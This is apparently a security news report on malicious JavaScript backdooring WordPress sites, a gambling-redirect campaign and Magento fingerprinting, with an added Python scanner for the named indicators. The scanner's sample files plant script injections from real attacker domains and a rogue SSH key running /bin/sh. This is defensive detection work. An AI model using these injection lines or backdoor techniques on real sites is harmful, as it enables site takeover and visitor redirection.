
Over 1,000 WordPress websites have been infected with third-party JavaScript code that injects four separate backdoors.
“Creating four backdoors gives attackers multiple re-entry points if one is detected and deleted,” c/side researcher Himanshu Anand said in an analysis published Wednesday.
The malicious JavaScript is known to be served via cdn.csyndication[.]com. At the time of writing, as many as 908 websites contain references to the domain in question.

The functions of the four backdoors are as follows:
Backdoor 1 uploads and installs a fake plugin named “Ultra SEO Processor”, which is then used to execute attacker-issued commands.
Backdoor 2 injects malicious JavaScript into wp-config.php.
Backdoor 3 adds an attacker-controlled SSH key to the authorized_keys file, giving the attacker persistent remote access (which is why the mitigation advice below starts with removing rogue SSH keys).
Backdoor 4 executes remote commands and fetches another payload from gsocket[.]io, most likely to open a reverse shell.
To mitigate the risk posed by these attacks, users are recommended to remove rogue SSH keys, rotate WordPress administrative credentials, and monitor system logs for suspicious activity.
The development comes as the cybersecurity company detailed another malware campaign in which more than 35,000 websites have been compromised with malicious JavaScript designed to “fully hijack a user’s browser window” and redirect site visitors to a Chinese gambling platform.
“The attack appears to target or originate from Mandarin-speaking regions. The final landing page presents gambling content under the ‘Kaiyun’ brand.”
The redirects occur via JavaScript hosted on five different domains, which acts as the loader for the main payload responsible for performing the redirect:
mlbetjs[.]com
ptfafajs[.]com
zuizhongjs[.]com
jbwzzzjs[.]com
jpbkte[.]com
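The indicators above (the backdoor loader domain, the fake plugin name, the wp-config.php injection, the gsocket[.]io payload source, rogue SSH keys, and the five redirect-loader domains) are enough to write a first-pass triage scan for a WordPress install. The following Python script is an added example, not c/side's tooling or anything published with the campaign reports. Everything it searches for comes from the text above; the `<script>`-tag check on wp-config.php is a heuristic (a PHP configuration file should never contain one), the plugin is matched by its `Plugin Name:` header rather than by directory, and the sample tree it builds (the `ultra-seo` slug, the key material, the file contents) is constructed for the demo.

```python
"""Triage scanner for the indicators in the text above (added example, not
c/side's tooling). Walks a WordPress tree and reports each indicator found."""
import re
import tempfile
from pathlib import Path

# Indicators from the reporting above, with the "[.]" defanging removed
# because the strings appear on disk with real dots.
BACKDOOR_LOADER = "cdn.csyndication.com"          # loader of the 4 backdoors
PAYLOAD_SOURCE = "gsocket.io"                     # backdoor 4 fetches from here
REDIRECT_LOADERS = ["mlbetjs.com", "ptfafajs.com", "zuizhongjs.com",
                    "jbwzzzjs.com", "jpbkte.com"]  # gambling-redirect loaders
FAKE_PLUGIN_NAME = "Ultra SEO Processor"          # backdoor 1's fake plugin

DOMAIN_RE = re.compile("|".join(re.escape(d) for d in
                       [BACKDOOR_LOADER, PAYLOAD_SOURCE] + REDIRECT_LOADERS),
                       re.IGNORECASE)
SCRIPT_TAG_RE = re.compile(r"<script\b", re.IGNORECASE)
PLUGIN_HEADER_RE = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+?)\s*$", re.MULTILINE)


def scan_wordpress(root, authorized_keys=None, known_keys=frozenset()):
    """Return sorted (relative path, finding) pairs for a WordPress tree.

    known_keys holds the "<type> <base64>" pairs the admin expects in
    authorized_keys; any other key there is reported as rogue.
    """
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        for m in DOMAIN_RE.finditer(text):
            findings.add((rel, "reference to " + m.group(0).lower()))
        # wp-config.php holds only PHP configuration; a <script> tag there is
        # the JavaScript injection attributed to backdoor 2 (heuristic check).
        if path.name == "wp-config.php" and SCRIPT_TAG_RE.search(text):
            findings.add((rel, "<script> tag inside wp-config.php"))
        # WordPress plugins declare their name in a header comment; the fake
        # plugin from backdoor 1 is matched by that name, not by directory.
        if rel.startswith("wp-content/plugins/") and path.suffix == ".php":
            m = PLUGIN_HEADER_RE.search(text)
            if m and m.group(1) == FAKE_PLUGIN_NAME:
                findings.add((rel, "fake plugin: " + FAKE_PLUGIN_NAME))
    if authorized_keys is not None:
        for line in Path(authorized_keys).read_text().splitlines():
            parts = line.split()
            if not parts or parts[0].startswith("#"):
                continue
            # Skip any leading options (command="...", from="...") and locate
            # the key-type token so the comparison ignores them.
            idx = next((i for i, p in enumerate(parts)
                        if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
            if idx is None or idx + 1 >= len(parts):
                continue
            key = parts[idx] + " " + parts[idx + 1]
            if key not in known_keys:
                comment = " ".join(parts[idx + 2:]) or "(no comment)"
                findings.add(("authorized_keys", "rogue SSH key: " + comment))
    return sorted(findings)


def build_sample_site(base):
    """Constructed sample tree (not a real compromise) that trips every check.
    The plugin slug 'ultra-seo' and the key material are made up for the demo."""
    base = Path(base)
    plugin_dir = base / "wp-content" / "plugins" / "ultra-seo"
    plugin_dir.mkdir(parents=True)
    (base / "wp-content" / "uploads").mkdir()
    (base / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    (base / "wp-config.php").write_text(
        "<?php\ndefine('DB_NAME', 'wp');\n?>\n"
        '<script src="https://cdn.csyndication.com/x.js"></script>\n')
    (plugin_dir / "ultra-seo.php").write_text(
        "<?php\n/*\n * Plugin Name: Ultra SEO Processor\n */\n")
    (base / "wp-content" / "uploads" / "t.js").write_text(
        "var s=document.createElement('script');"
        "s.src='https://zuizhongjs.com/a.js';document.head.appendChild(s);\n")
    keys = base / "authorized_keys"   # stand-in for ~/.ssh/authorized_keys
    keys.write_text("ssh-ed25519 AAAAC3known admin@host\n"
                    'command="/bin/sh" ssh-ed25519 AAAAC3rogue attacker\n')
    return base, keys


def demo():
    """Build the sample in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        base, keys = build_sample_site(tmp)
        return scan_wordpress(base, keys, {"ssh-ed25519 AAAAC3known"})


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

On a real host, point `scan_wordpress` at the web root and pass the path of the web user's `~/.ssh/authorized_keys` plus the set of keys you actually issued; anything the script reports should be treated as a lead for the log review and credential rotation recommended above, not as proof of compromise on its own, since the domain match is a plain string search.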

The findings follow a new report from Group-IB about a threat actor called ScreamedJungle that injects JavaScript code dubbed Bablosoft JS into compromised Magento websites to collect visitor fingerprints. Over 115 e-commerce sites are believed to have been affected so far.
The injected script is “part of the Bablosoft Browser Automation Studio (BAS) suite,” the Singapore-based company said, adding that it “contains several other features to collect information about the systems and browsers of users accessing compromised websites.”
The attacker is said to be exploiting known vulnerabilities in unpatched Magento versions (CVE-2024-34102 and CVE-2024-20720) to breach the websites. The financially motivated threat actor was first observed in the wild in late May 2024.
“Browser fingerprinting is a powerful technique commonly used on websites to track user activity and tailor marketing strategies,” Group-IB said. “However, this information is also being utilized by cybercriminals to mimic legitimate user behavior, circumvent security measures and carry out fraudulent activities.”